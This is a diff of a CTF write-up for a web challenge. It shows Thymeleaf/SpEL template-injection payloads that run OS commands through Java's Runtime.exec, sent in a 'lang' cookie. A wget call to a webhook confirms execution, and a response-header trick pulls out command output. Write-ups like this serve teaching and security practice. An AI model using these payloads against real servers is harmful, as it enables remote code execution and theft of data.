beerpwn/ctf/2021/aero_CTF/web/Localization_is_hard/readme.md

 * `__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("<cmd-here>").getInputStream()).next()}__::.x`
 * `${T(java.lang.Runtime).getRuntime().exec('<cmd-here>')}`

-At this point I simply tried one of these payloads into the __lang__ cookie with a command such as ping `wget <webhook-endpoint>` to verify the __command execution__ and it worked __:=)__.
+At this point I simply tried one of these payloads into the __lang__ cookie with a command such as `wget <webhook-endpoint>` to verify the __command execution__ and it worked __:=)__.

 ![alt img](rce-poc-2.PNG)

-Now I had __RCE__ and since the flag was located in __/__, I needed some way to enumerate the file system contents and extract the flag.
+Now I had __RCE__, since the flag was located at __/__, I needed some way to enumerate the file system contents and extract the flag.
 Problem was that it was not possible to use all the bash functionality such us `|, &, ``, $`.
 I also tried to extract files with and write files with `wget`, but no luck with that solution.
 To summarize I had the ability to run commands, but no way to build a payload (__time based__ or __OOB__) that allow me to extract the output of an arbitrary command.
 At this point I start to read the __thymeleaf__ [documentation](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html) and some [Java-doc](https://docs.oracle.com/javaee/6/api/javax/servlet/http/HttpServletResponse.html) for Java objects, the basic idea that I had was to insert the output of the executed command directly into the __response__, for example by using a crafted HTTP header response with the output.
 After a bit of pain, I was able to build this payload: `__${#response.setHeader("cmd-out","test")}__::.x` and it worked __:)__!\
 *[the above payload should work well on __Thymeleaf 3.0__, probably for __Thymeleaf 2.1__ could be: `__${#ctx.httpServletResponse.setHeader("cmd-out","test")}__::.x`]